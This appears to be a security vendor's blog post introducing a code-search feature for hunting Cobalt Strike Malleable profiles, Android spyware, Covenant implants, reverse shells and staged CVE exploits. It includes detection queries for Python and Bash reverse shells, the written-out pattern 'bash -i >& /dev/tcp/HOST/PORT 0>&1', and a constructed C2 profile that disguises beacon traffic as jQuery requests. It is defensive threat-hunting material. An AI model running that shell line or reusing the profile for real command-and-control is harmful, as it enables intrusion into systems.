Introducing Code Search on AttackCapture: Uncover Exploit Code, Reverse Shells, C2 Configs, and More
Published on
Oct 15, 2024
Overview
Spotting malicious code across large collections of files is daunting, especially as attackers adopt new obfuscation libraries to hinder analysis. Code Search, a feature of our AttackCapture platform, addresses this by letting security teams and researchers run full-text queries across diverse file types to surface indicators of compromise (IoCs) such as exploit code, reverse shells, and C2 configurations.
In our recent post introducing AttackCapture, we described how the platform discovers and categorizes attacker burner instances, indexing everything from recon tools and malware to remote exploits and exfiltration tooling. Code Search lets threat hunters locate and analyze specific attack patterns, such as unique Cobalt Strike configurations, with every hit available for preview and download.
Cobalt Strike Profiles
Cobalt Strike is a commercial post-exploitation framework that is routinely pirated and repurposed by cybercriminals and APT groups for command-and-control (C2). Malleable C2 profiles let an operator shape Beacon traffic (HTTP URIs and headers, TLS certificate fields, and how data is encoded in transit) so that it resembles legitimate services such as Microsoft, Google, or Amazon, or even another adversary's tooling, which makes the traffic harder to flag with generic signatures.
Because profiles are written in a small domain-specific language (set statements, header statements, nested http-get/http-post/https-certificate blocks, and data-transform steps such as base64url and prepend), they contain distinctive statements and structure that are easy to query for across files. The following examples show Code Search queries that locate Malleable profiles across thousands of open directories and reveal the patterns adversaries reuse in them.
Profile: jquery-3.3.2
Code Search Query: "set uri /jquery-3.3.2.min.js" AND "set OU Certificate Authority"
Brief Description: This profile mimics requests for the popular jQuery JavaScript library. Because the resulting traffic blends in with ordinary web requests, the profile has been reused repeatedly by adversaries trying to evade monitoring inside targeted networks.
Profile: Cobalt Strike 4.9
Code Search Query: "header Server gsw" AND "set module_x86 netshell.dll"
Brief Description: In late August 2024, Michael Koczwara posted about using AttackCapture to uncover Cobalt Strike servers running unique or custom Malleable profiles, including a profile for Cobalt Strike 4.9 that had not previously been reported publicly. The query above is straightforward: two distinctive keywords joined by a single AND.
Profile: geacon_plus
Code Search Query: "set uri /www/handle/doc" AND "set OU NN Fern"
Brief Description: geacon_plus is a Golang reimplementation of the Cobalt Strike Beacon built for cross-platform use on macOS, Linux, and Windows. Its profile's https-certificate block sets distinctive TLS certificate fields (the OU value in the query above), which can be pivoted on to identify its infrastructure during network scans.
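To turn a profile like the ones above into hunting indicators, the following added example (our illustration, not code from AttackCapture or from Cobalt Strike) parses the Malleable C2 statement syntax, `set KEY "VALUE";` and `header "NAME" "VALUE";` inside nested brace blocks, and pulls out the fields a hunter pivots on: request URIs, Server and Host headers, the https-certificate subject fields, and the user agent. The profile text embedded in the script is constructed for this example; it imitates a jQuery-themed profile but is not the real one, and the NetDNA-cache header value and code.jquery.com host are illustrative.

```python
"""Extract hunt-ready indicators from a Cobalt Strike Malleable C2 profile.
Added example: the parser is ours, and SAMPLE_PROFILE is a constructed
profile in genuine Malleable syntax, not a real attacker profile."""
import re

SAMPLE_PROFILE = r'''
# constructed jQuery-themed profile (comment lines start with '#')
set sleeptime "45000";
set jitter    "37";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

https-certificate {
    set CN "jquery.com";
    set O  "jQuery";
    set OU "Certificate Authority";
    set validity "365";
}

http-get {
    set uri "/jquery-3.3.2.min.js /jquery-3.3.2.slim.min.js";
    client {
        header "Accept" "text/javascript, application/javascript, */*";
        header "Host" "code.jquery.com";
        metadata { base64url; prepend "__cfduid="; header "Cookie"; }
    }
    server {
        header "Server" "NetDNA-cache/2.2";
        header "Content-Type" "application/javascript; charset=utf-8";
        output { mask; base64url; print; }
    }
}

http-post {
    set uri "/jquery-3.3.1.min.js";
    client { header "Host" "code.jquery.com"; id { mask; base64url; parameter "__cfduid"; } }
    server { header "Server" "NetDNA-cache/2.2"; output { mask; base64url; print; } }
}
'''

# Tokens: a double-quoted string (may contain ';' or spaces), a brace,
# a semicolon, or a bare word.
TOKEN_RE = re.compile(r'"(?:[^"\\]|\\.)*"|[{};]|[^\s"{};]+')


def _unquote(tok: str) -> str:
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def parse_profile(text: str):
    """Return (block_path, keyword, key, value) for every 'set' and 'header'
    statement; block_path is the dotted nesting, e.g. 'http-get.server'."""
    text = re.sub(r'(?m)^\s*#.*$', '', text)  # drop comment lines
    stack, stmt, out = [], [], []
    for tok in TOKEN_RE.findall(text):
        if tok == '{':
            # the word before '{' names the block ('http-get "variant" {' keeps 'http-get')
            stack.append(_unquote(stmt[0]) if stmt else '?')
            stmt = []
        elif tok == '}':
            if stack:
                stack.pop()
            stmt = []
        elif tok == ';':
            if len(stmt) >= 3 and stmt[0] in ('set', 'header'):
                out.append(('.'.join(stack), stmt[0], _unquote(stmt[1]), _unquote(stmt[2])))
            stmt = []  # other statements (mask, base64url, prepend ...) are transforms
        else:
            stmt.append(tok)
    return out


def extract_indicators(text: str) -> dict:
    """Reduce the parsed statements to network- and TLS-level indicators."""
    ind = {'uris': set(), 'server_headers': set(), 'hosts': set(), 'cert': {}, 'useragent': None}
    for path, kw, key, val in parse_profile(text):
        top = path.split('.')[0]
        if kw == 'set' and key == 'uri' and top in ('http-get', 'http-post'):
            ind['uris'].update(val.split())  # 'set uri' may list several URIs
        elif kw == 'set' and path == 'https-certificate':
            ind['cert'][key] = val
        elif kw == 'set' and key == 'useragent' and path == '':
            ind['useragent'] = val
        elif kw == 'header' and key.lower() == 'server' and path.endswith('.server'):
            ind['server_headers'].add(val)
        elif kw == 'header' and key.lower() == 'host' and path.endswith('.client'):
            ind['hosts'].add(val)
    return ind


if __name__ == '__main__':
    for name, value in extract_indicators(SAMPLE_PROFILE).items():
        print(f'{name}: {sorted(value) if isinstance(value, set) else value}')
```

The URIs and Server header feed web-proxy and IDS rules, the https-certificate fields (CN, O, OU) feed certificate-transparency and scan-data pivots of the kind the geacon_plus query above relies on, and the Host header tells you which legitimate domain the Beacon is impersonating.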
EagleSpy Malware
EagleSpy is a powerful Android spyware tool that covertly gathers data from infected devices, including contacts, messages, and location details. Using Telegram's Bot API, it relays this stolen information directly to the attacker's infrastructure.
Code Search Query: EagleSpy
Brief Description: This query shows the value of full-text search: a single word is enough to identify multiple HTML files containing the distinctive @EagleSpy identifier in their code. You may recognize the IP address in Figure 5 from our previous research into a cybercriminal's exposed server.
Covenant Grunt Implants
Covenant is an open-source .NET C2 framework widely used in red team operations to manage post-exploitation activity. Its implant, the Grunt, executes tasks on compromised systems, enabling activities such as lateral movement and credential theft. Although built for penetration testers, Covenant has been observed in numerous intrusions in which adversaries deployed Grunt agents to control victim networks.
Code Search Query: Grunt.GruntStager
Description: Each Grunt is generated through Covenant's web interface, where the operator chooses the stager type and communication parameters. The query above keys on the Grunt.GruntStager identifier to locate implants that have been staged for delivery on open directories.
Python & Bash Reverse Shells
Python and Bash reverse shells are used in both malicious operations and legitimate security testing to obtain remote access to a target. Because the compromised machine initiates an outbound connection back to the attacker's listener, they sidestep firewall rules that block inbound connections but permit egress.
Python reverse shells are valued for their flexibility and cross-platform reach, while Bash reverse shells are simple and common on Unix-like systems. Both are staples of adversary simulation, since they show what an attacker who has already gained code execution on a host can do next.
Python Shells
Code Search Query: ("s=socket.socket" OR "import socket,subprocess,os") AND ("/bin/bash" OR "/bin/sh") AND "-i"
Description: This query is more involved than the earlier ones: it combines AND and OR operators and uses parentheses to group alternatives. Its goal is to filter for the common building blocks of a Python reverse shell: a socket (s=socket.socket, or the import socket,subprocess,os line typical of one-liners), a shell binary (/bin/bash or /bin/sh), and the -i flag that makes the spawned shell interactive. On its own "-i" would match far too much; it earns its place only because it is ANDed with the socket and shell-path clauses.
Bash Shells
Code Search Query: "sh -i" AND "/dev/tcp"
Description: The Bash query looks for the interactive-shell invocation sh -i (the -i flag is what gives the attacker a prompt) combined with /dev/tcp, the Bash pseudo-device that opens a TCP socket when a redirection targets it. Both terms are needed: the AND narrows the results to scripts that wire an interactive shell to an outbound TCP connection, the classic bash -i >& /dev/tcp/HOST/PORT 0>&1 pattern, and filters out unrelated hits on sh -i. Note that /dev/tcp is a Bash feature rather than a real filesystem path, so these one-liners fail under dash (the default /bin/sh on Debian-based systems) and must be run with bash.
Exploit Code
Our final section covers the discovery of exploit code for known Common Vulnerabilities and Exposures (CVEs) within the open directories curated by AttackCapture. Seeing which exploits are staged, and in what form, gives defenders a concrete view of how attackers intend to exploit a vulnerability, so security teams can prioritize patching and detection ahead of a breach rather than after it.
CVE-2024-6387
Code Search Query: 7etsuo-regreSSHion.c
Description: This query searches for a C file named "7etsuo-regreSSHion.c," a publicly circulated proof of concept for regreSSHion (CVE-2024-6387), a signal-handler race condition in OpenSSH's server (sshd, versions 8.5p1 through 9.7p1 on glibc-based Linux) that can yield unauthenticated remote code execution as root. Searching on the file name quickly locates open directories where this exploit may be staged. Public PoCs for this bug vary widely in reliability, so any copy found this way should be treated as untrusted and analyzed in an isolated environment.
CVE-2024-29895
Code Search Query: /cacti/cmd_realtime.php
Description: The final query targets the cmd_realtime.php file in Cacti, which was vulnerable to command injection (CVE-2024-29895). The flaw affected the 1.3.x DEV branch and allowed an unauthenticated user to execute arbitrary commands on the server when PHP's register_argc_argv option is enabled. In Figure 11 below, we see several Python variations of the exploit alongside Nuclei scanner checks, likely used to test servers for exposure to the vulnerability.
Conclusion
Code Search within AttackCapture gives defenders the ability to uncover a wide range of malicious code, from exploits and reverse shells to C2 configurations, to name just a few. This feature helps security teams gain insight into potential threats and proactively bolster defenses against evolving attack methods. As we continue to expand Code Search to cover additional configurations such as Havoc C2 (coming soon), we invite your feedback on other file types or features that would enhance your threat-hunting capabilities.